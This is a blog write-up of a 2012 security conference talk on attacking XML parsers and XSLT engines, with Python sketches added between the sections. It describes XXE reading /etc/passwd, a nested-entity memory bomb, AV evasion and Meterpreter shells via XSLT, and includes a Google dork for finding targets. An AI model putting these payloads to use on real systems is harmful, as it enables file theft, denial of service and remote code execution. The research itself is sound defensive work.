HITB2012AMS Day 2 – Attacking XML Processing

Dressed in a classy Corelan Team T-shirt, Nicolas Grégoire kicks off his presentation by introducing himself. Eighteen months ago, a customer asked Nicolas to audit some XML-DSig applications, and he found a number of bugs. This prompted him to do more research on the topic.

This technology is present in a LOT of applications today.

XML 101

Nicolas continues by explaining some basics about the eXtensible Markup Language: how XML documents are structured and the purpose of using multiple namespaces. Namespaces are there to avoid ambiguities, but you can also use them to trigger specific features. You can, for example, call PHP code from XSLT.

A valid XML document can contain more than just data. It can embed XSLT code, define a grammar, and include processing instructions. Parsers should be aware of this to avoid issues.
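To make the "more than just data" point concrete, here is a minimal Python sketch that lists the non-data constructs in a document. The sample document, the `inventory` helper and its field names are illustrative assumptions and are not taken from the talk.

```python
from xml.dom import minidom, Node

# Hypothetical Atom-like sample: it carries a stylesheet processing
# instruction, an internal DTD and an element from the XSLT namespace.
SAMPLE = """<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="style.xsl"?>
<!DOCTYPE feed [
  <!ENTITY author "Example Author">
]>
<feed xmlns="http://www.w3.org/2005/Atom"
      xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <title>Demo</title>
  <xsl:value-of select="'embedded XSLT'"/>
</feed>
"""


def inventory(xml_text):
    """Return a dict describing the non-data constructs found in xml_text."""
    doc = minidom.parseString(xml_text)
    found = {"doctype": False, "processing_instructions": [], "namespaces": set()}

    def walk(node):
        if node.nodeType == Node.DOCUMENT_TYPE_NODE:
            found["doctype"] = True
        elif node.nodeType == Node.PROCESSING_INSTRUCTION_NODE:
            found["processing_instructions"].append(node.target)
        elif node.nodeType == Node.ELEMENT_NODE and node.namespaceURI:
            found["namespaces"].add(node.namespaceURI)
        for child in node.childNodes:
            walk(child)

    walk(doc)
    return found


if __name__ == "__main__":
    print(inventory(SAMPLE))
```

An inventory like this is only a first triage step during an audit: it tells you which features a document asks for, not which ones the target parser will actually honor.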

XML is used in a lot of technologies (SVG, SOAP, XML-RPC, XSLT, XKMS, SAML, WSDL, REST, and so on). The Microsoft Lync online service uses XML to enable dial-in conferencing. W3C uses it in its online XSLT 2.0 service, which allows you to upload files, potentially leading to Java code execution on the server side (not tested). The following simple Google dork might get you more information about other services: inurl:"xslurl=http"

When auditing an app that parses xml, you should ask yourself the following questions, Nicolas continues:

  • What are the vectors used for XML data?
  • Is the data being processed? If so, by whom and where (client/server/gateway)?
  • What is the attack surface?
  • What are the processing points? If you can submit data, does it get executed or not? If you can submit grammar, will it resolve external entities? If you can provide XSLT code, check which extensions are available (to access databases or run Java code).

An interesting example: Wikipedia allows you to upload an SVG file and transforms it into a PNG. In other words, it parses the SVG and converts it into an image.

Nicolas explains that all demos in the presentation are based on Atom feeds. He wrote a couple of feed readers: one in Perl, another in PHP, and a third in JSP/Java.


XDP is a container for PDF/XFA documents. Nicolas used a three-year-old vulnerability (CoolType) and attempted to avoid AV detection by using encapsulation. By modifying the Metasploit module for this particular exploit, he managed to evade all 43 AV engines.

Temporary DoS

By creating a temporary DoS condition, you may be able to detect that something is being processed in a black-box audit scenario (similar to the benchmark trick for SQL injection). He demonstrated a couple of ways to force the allocation of multiple gigabytes of RAM.
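The write-up does not say which techniques were demonstrated. One well-known way to make a parser allocate far more memory than the document's size suggests is nested entity expansion, and the arithmetic behind it can be sketched as follows. The function names and the `bomb` element are illustrative assumptions. Only the size is computed for the large case; the large document is never parsed here.

```python
def build_nested_entities(levels, fanout, seed_text="lol"):
    """Build a document whose internal entities reference each other in layers."""
    lines = [
        '<?xml version="1.0"?>',
        "<!DOCTYPE bomb [",
        f'  <!ENTITY e0 "{seed_text}">',
    ]
    for i in range(1, levels + 1):
        # Each layer references the previous layer `fanout` times.
        refs = f"&e{i - 1};" * fanout
        lines.append(f'  <!ENTITY e{i} "{refs}">')
    lines.append("]>")
    lines.append(f"<bomb>&e{levels};</bomb>")
    return "\n".join(lines)


def expanded_size(levels, fanout, seed_text="lol"):
    """Characters produced if a parser fully expands the top-level entity."""
    return len(seed_text) * fanout ** levels


if __name__ == "__main__":
    doc = build_nested_entities(levels=9, fanout=10)
    print(len(doc), "characters on the wire")
    print(expanded_size(9, 10), "characters after full expansion")
```

With 9 layers and a fan-out of 10, a document of well under a kilobyte expands to 3 × 10^9 characters, which is why a noticeable delay in the response can reveal that the input is being parsed. Many current parsers cap entity expansion, so the effect depends on the target.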

XXE Exploitation

XML External Entities (XXE) is probably the most common XML vulnerability, Nicolas explains. You can basically specify a filename (/etc/passwd) in an entity, and every time the entity is referenced, the reference gets replaced by the contents of the file. RESTlet, Yandex, OpenOffice, SharePoint, DotNetNuke, and IceWarp are just a couple of applications that speak REST and might be vulnerable to XXE attacks.
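The general shape of such a document can be sketched as below. The `entry` and `title` element names and the helper functions are illustrative assumptions. The parser is Python's standard library `xml.etree.ElementTree`, not one of the parsers from the talk; it is used here only to check whether a given parser leaks the referenced file.

```python
import os
import tempfile
import xml.etree.ElementTree as ET


def build_xxe_document(target_path):
    """Return an XML document declaring an external entity that points at target_path."""
    return (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE entry [\n"
        f'  <!ENTITY xxe SYSTEM "file://{target_path}">\n'
        "]>\n"
        "<entry><title>&xxe;</title></entry>"
    )


def parse_title(xml_text):
    """Parse with the standard library; return the title text, or None if parsing is refused."""
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError:
        return None
    return root.findtext("title")


def leaks_file(secret="s3cret-marker"):
    """Write a marker to a temporary file and report whether the parser echoes it back."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as handle:
        handle.write(secret)
        path = handle.name
    try:
        title = parse_title(build_xxe_document(path))
    finally:
        os.unlink(path)
    return title is not None and secret in title


if __name__ == "__main__":
    print(build_xxe_document("/etc/passwd"))
    print("standard-library parser leaks the file:", leaks_file())
```

A vulnerable parser would return the marker as the title text. Using a marker file you created yourself, rather than a real system file, keeps a test like this harmless.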

XXE attacks can be very powerful. You can easily hit the internal network, do banner grabbing (by using something like ssh://ip:22, for example) and perform blind attacks. In certain scenarios, you can use the file handler to steal NTLM hashes or "pass the hash", or list directories to get more information. Depending on the available extensions, there's a lot more you can do. Successful exploitation depends on:

  • XML parser
  • the OS
  • programming language used
  • application-specific features (for example, using the fact that PHP can return base64-encoded data to read a file that contains null bytes)

Nicolas performed some really impressive demos using a variety of techniques, which allowed him to read files and memory and to connect to ports on other hosts.
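The base64 point in the list above can be illustrated in Python: raw bytes containing NUL cannot appear in a well-formed XML document, while their base64 form can. The `entry` and `content` element names and the sample bytes are assumptions for illustration. PHP's `php://filter` wrapper with `convert.base64-encode` is one commonly cited way to obtain such output, but the write-up does not say which mechanism was used in the demo.

```python
import base64
import xml.etree.ElementTree as ET

# Hypothetical file contents with embedded null bytes.
RAW = b"MZ\x00\x01binary\x00data"


def embed(payload_text):
    """Place payload_text inside a small, hypothetical Atom-like entry."""
    return f"<entry><content>{payload_text}</content></entry>"


def can_parse(xml_text):
    """Return True if the standard-library parser accepts xml_text."""
    try:
        ET.fromstring(xml_text)
    except (ET.ParseError, ValueError):
        return False
    return True


# Embedding the bytes directly yields a document the parser rejects.
raw_doc = embed(RAW.decode("latin-1"))

# The base64 alphabet contains only characters that are legal in XML text.
encoded_doc = embed(base64.b64encode(RAW).decode("ascii"))
recovered = base64.b64decode(ET.fromstring(encoded_doc).findtext("content"))

if __name__ == "__main__":
    print("raw bytes parse:", can_parse(raw_doc))
    print("base64 parses:", can_parse(encoded_doc))
    print("round trip intact:", recovered == RAW)
```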

XSLT Exploitation

The purpose of XSLT is to transform XML into something else. XSLT is Turing complete. Its main use is to display XML to humans, but it can also be used to extract data and convert between formats. You can find XSLT engines in web apps, browsers, database servers (Oracle, for example), word processors, and XML-DSig implementations. Nicolas played with a bunch of apps and discovered bugs in Xalan-J, Sablotron, libxslt, TransforMiiX, XT, Adobe, Oracle-C, 4Suite, and Altova.

First, he performed some basic mutation-based fuzzing. The recipe: take a bunch of XSLT engines, get a bunch of input files (downloaded from the internet), use a diversifier (Radamsa), set up monitoring… and go. He explains that he typically takes 5,000 files and lets Radamsa create 10,000,000 files. To monitor, he used valgrind and AddressSanitizer. Using this approach, he found a couple of bugs (most of them not patched yet) in Mozilla Firefox, WebKit, Opera, and Oracle (ORA-07445). To trigger the XSLT parser in Oracle, you can use the code in the screenshot below. At the bottom of the screenshot, you can see that it can lead to control of FP:

[Screenshot: code that triggers the XSLT parser in Oracle, with the resulting control of FP shown at the bottom]
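The mutation-based fuzzing workflow described above (seed files, a mutator, a target, monitoring) can be sketched in a few lines of Python. This is not Radamsa: `mutate` is a deliberately naive byte-replacement stand-in, the target is Python's bundled expat XML parser rather than an XSLT engine, and the seed and all names are assumptions for illustration.

```python
import random
from xml.parsers import expat

# Hypothetical seed; in practice you would start from thousands of real files.
SEED = (
    b'<xsl:stylesheet version="1.0" '
    b'xmlns:xsl="http://www.w3.org/1999/XSL/Transform">'
    b'<xsl:template match="/"><out/></xsl:template>'
    b"</xsl:stylesheet>"
)


def mutate(seed_bytes, rng, max_changes=4):
    """Return a copy of seed_bytes with a few randomly chosen bytes replaced."""
    data = bytearray(seed_bytes)
    for _ in range(rng.randint(1, max_changes)):
        data[rng.randrange(len(data))] = rng.randrange(256)
    return bytes(data)


def classify(sample):
    """Feed one sample to the parser and report how it ended."""
    parser = expat.ParserCreate()
    try:
        parser.Parse(sample, True)
    except Exception:
        # Any Python-level exception counts as a clean rejection. A real
        # memory-safety bug would crash the process instead, which is what
        # tools such as valgrind or AddressSanitizer are there to catch.
        return "rejected"
    return "accepted"


def fuzz(seed_bytes, iterations, seed=0):
    """Run `iterations` mutated samples through the parser and tally the outcomes."""
    rng = random.Random(seed)
    outcomes = {"accepted": 0, "rejected": 0}
    for _ in range(iterations):
        outcomes[classify(mutate(seed_bytes, rng))] += 1
    return outcomes


if __name__ == "__main__":
    print(fuzz(SEED, 1000))
```

Seeding the random generator makes a run reproducible, which matters when you need to regenerate the exact sample that caused a crash.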

The problem with XSLT is that it is a functional language. There are no loop constructs (while, for, …) and every variable is read-only. This complicates brute forcing and reading STDOUT. You can, however, use an XSL for-each location wrapper to read something from another file. This simulates a "for" loop. If you combine this with SQL extensions, you would be able to attack internal databases and dump tables.

The "while" loop, needed to read STDOUT, is a bit more complex to implement. The idea is to use an XSLT Loop Compiler (by @obqo). It exposes extra loop constructs that are not valid XSLT code. After compiling, the input gets converted into a valid XSLT file, but the resulting file will be quite large.
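The write-up does not describe what the compiled output looks like. A common way to express a "while" loop in a language without loop constructs or mutable variables is recursion, and the idea can be shown by analogy in Python (this is not XSLT, and not the Loop Compiler's actual output). `read_all` and `make_reader` are hypothetical names; `make_reader` stands in for a process's STDOUT.

```python
def read_all(read_chunk, collected=()):
    """Emulate `while chunk: collect(chunk)` using recursion and immutable values."""
    chunk = read_chunk()
    if not chunk:
        # Loop condition is false: return what has been accumulated.
        return "".join(collected)
    # "Next iteration": call again with a new tuple instead of mutating state.
    return read_all(read_chunk, collected + (chunk,))


def make_reader(text, size):
    """Hypothetical stand-in for STDOUT: hands out text in fixed-size chunks."""
    chunks = iter([text[i:i + size] for i in range(0, len(text), size)])
    return lambda: next(chunks, "")


if __name__ == "__main__":
    print(read_all(make_reader("uid=0(root) gid=0(root)", 5)))
```

Each call binds its variables exactly once, which mirrors the read-only variables mentioned above. The accumulated state travels through the arguments instead.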

By combining a source that contains the commands you want to run with the code that implements the loops (to execute them and return the output), you can run arbitrary commands on a remote system and retrieve the output.

On December 30, 2011, at BerlinSides, Nicolas claimed that he couldn't find a way to execute Java in XSLT, but he was then contacted by @mihi42, who shared some details on how to do it. Nicolas ends the presentation by demonstrating how to get Meterpreter shells by embedding PHP/Java code in XSLT files. The Metasploit module that creates XSLT files for PHP and Java should be released shortly.

[Screenshot: PHP Meterpreter]

[Screenshot: Java Meterpreter]



XML is everywhere. You should understand that it's more than just data. DTD and XXE attacks have been known for more than 10 years, and the offensive side is progressing quickly (because XML is increasing in popularity).

You can get more info about his work, the results of his research and some source code on his site (which, ironically, is based on a wiki that uses REST, among others, and is vulnerable to certain types of attacks).

Brilliant work !





© 2012, Peter Van Eeckhoutte (corelanc0d3r). All rights reserved.
